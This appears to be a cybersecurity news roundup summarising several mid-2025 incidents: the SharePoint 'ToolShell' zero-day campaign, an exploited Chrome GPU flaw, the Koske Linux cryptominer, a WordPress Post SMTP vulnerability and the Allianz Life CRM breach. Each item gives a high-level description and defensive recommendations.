Microsoft SharePoint Zero-Day Vulnerabilities Lead to Global Compromises
A severe series of exploits targeting Microsoft SharePoint on-premises servers across North America and Europe has escalated into one of July 2025’s most urgent cybersecurity crises. With over 400 confirmed organizations affected, including major government, finance, and healthcare entities, the campaign underscores critical issues in enterprise document management security.
Technical Overview of the Exploit
Attackers weaponized two zero-day vulnerabilities discovered at the May 2025 Pwn2Own contest. The vulnerabilities, scoring 9.8 and 7.1 on the CVSS scale, allow for unauthenticated remote code execution and privilege escalation. These flaws enable a threat actor to bypass SharePoint’s authentication mechanisms and gain administrative control over target servers.
Notably, attackers leveraged these exploits even after an initial patch was made available July 8, using advanced techniques—such as web shell deployment and machine key theft—to maintain persistence. The campaign, known as “ToolShell,” has been attributed by Microsoft to three Chinese-linked groups (Linen Typhoon, Violet Typhoon, and Storm-2603), one of which has also distributed the Warlock ransomware variant on compromised systems.
Global Impact and Response
More than 75 direct compromises have been confirmed, affecting vital infrastructure and sensitive data held in SharePoint, which often acts as the backbone for file sharing and document management in Microsoft 365 environments. The US National Nuclear Security Administration was identified as a victim, raising concerns over the national security implications of the campaign.
Immediate Guidance
The US Cybersecurity and Infrastructure Security Agency (CISA) and Microsoft have both issued urgent remediation guidance. This includes:
- Immediate patching of all on-premises SharePoint instances
- Rotating machine keys to invalidate stolen tokens
- Disconnecting end-of-life and unsupported SharePoint servers from the internet
- Reviewing logs for anomalous activity or the presence of web shells
CrowdStrike’s Adam Meyers, quoted in relation to the incident, emphasized the gravity: “Anybody who’s got a hosted SharePoint server has got a problem.” Enterprise IT teams are advised to treat this threat as a top priority.
Google Chrome ANGLE and GPU Zero-Day Vulnerability Exploited in the Wild
Google’s Threat Analysis Group (TAG) recently disclosed active exploitation of a critical Chrome vulnerability, tracked as CVE-2025-6558, involving the ANGLE and GPU components. Attackers are using the vulnerability for drive-by attacks to gain remote code execution in targeted environments.
Details of the Attack Vector
The flaw enables malicious websites to trigger exploitable conditions within Chrome’s rendering pipeline, providing the attacker with the ability to execute arbitrary code. Since Chrome’s ANGLE and GPU components are closely tied to rendering and sandbox security, exploitation can lead to full browser compromise as well as potential privilege escalation at the operating system level.
Mitigations and Recommendations
Google responded with a rapid update cycle and has urged all users and organizations to upgrade immediately. Enterprises should also review automated browser deployment systems to ensure that patched versions propagate throughout their environments, especially those using Chrome in kiosk or industrial control deployments where update policies might lag.
Linux “Koske” Malware: AI-Enhanced Cryptomining via Polyglot JPEG Images
Security researchers have discovered a sophisticated Linux malware variant named Koske, notable for its AI-assisted payload delivery and evasion capabilities. This attack marks a new frontier in the use of multimedia as a malware carrier and demonstrates increasing automation and stealth in cryptojacking campaigns.
Indicators of Compromise and Technical Analysis
Koske uses polyglot JPEG images—specifically, pictures of pandas—that are dual-encoded both as graphics and as executable payloads. Upon delivery, these images are parsed by an AI-assisted shell loader, which then deploys a rootkit directly into system memory. The rootkit establishes a cryptomining process that is resistant to typical endpoint antivirus and runtime detection techniques.
The initial infection vector relies on exploiting misconfigured JupyterLab instances, potentially via CVE-2025-30370. Once inside, attackers gain a stealthy, persistent foothold, enabling the covert execution of mining operations with minimal observable system footprint.
Preventive Steps for Defenders
- Audit and lock down public-facing JupyterLab and similar data science platforms
- Monitor for abnormal resource consumption and suspicious image file executions
- Deploy defense-in-depth layers, including runtime memory scanning and AI-behavioral analysis
WordPress Post SMTP Critical Vulnerability—a Widespread Unpatched Risk
A critical vulnerability has been flagged in the popular Post SMTP plugin for WordPress, leaving nearly half of its users exposed to potential exploitation. The plugin, essential for website email delivery, is commonly used across business, government, and nonprofit websites for transactional messaging.
Technical Risk and Exploit Chain
The vulnerability allows remote attackers to execute arbitrary code, potentially taking control of affected WordPress sites. Attackers are exploiting the flaw by leveraging insecure authentication mechanisms and bypassing access controls to upload malicious scripts or escalate privileges within WordPress environments.
Patching and Remediation Urgency
With exploit code already circulating in underground forums, site administrators are urged to upgrade the Post SMTP plugin immediately and review installed plugins for unpatched or abandoned versions. Given the broad use of WordPress as an application platform, any compromise can rapidly propagate malware or lead to data exfiltration from e-commerce and member sites.
Allianz Life Insurance Customer Data Breach in Cloud CRM
Allianz Life Insurance Company confirmed a significant data breach after attackers succeeded in using advanced social engineering techniques to access and exfiltrate data from a cloud-based CRM. The incident exposed personal details for the majority of its 1.4 million US customers and select employees.
Attack Vector and Impact
On July 16, attackers manipulated helpdesk agents to reset multi-factor authentication and release new credentials, bypassing standard verification processes. This allowed unauthorized access to sensitive customer records.
The company has begun notifying affected individuals and law enforcement, including the FBI. There is currently no evidence that the attackers traversed further into Allianz’s broader IT network, but extensive regulatory reporting and state-level notifications are planned.
Lessons and Next Steps
The breach highlights ongoing weaknesses in helpdesk escalation and identity verification procedures, even at major enterprises. Organizations should reinforce employee training, harden MFA reset protocols, and consider additional real-time monitoring of access to sensitive SaaS platforms.